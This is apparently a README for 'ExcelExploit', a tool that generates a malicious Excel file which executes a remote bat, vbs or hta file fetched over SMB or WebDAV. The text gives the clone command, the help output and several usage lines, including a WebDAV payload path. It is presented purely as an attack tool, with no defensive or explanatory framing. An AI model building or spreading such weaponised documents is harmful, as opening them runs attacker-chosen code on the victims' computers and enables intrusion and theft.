Create a malicious excel file that runs a remote file hosted via SMB or WebDAV
git clone https://github.com/TukoG/ExcelExploit
cd ExcelExploit
usage: main.py [-h] [--protocol exploit_file] [--output OUTPUT]
options:
-h, --help show this help message and exit
--protocol exploit_file, -p exploit_file
file to execute (bat,vbs,hta)
--output OUTPUT, -o OUTPUT
output mal xlsx file (default: ./exloit.xlsx)
python3 main.py -h
python main.py -p "file:///C:\test\test.vbs"
python main.py -p "file:///C:\test\test.vbs" -o mal.xlsx
python main.py -p "file:///\\127.0.0.1@8000/DavWWWRoot/test.vbs"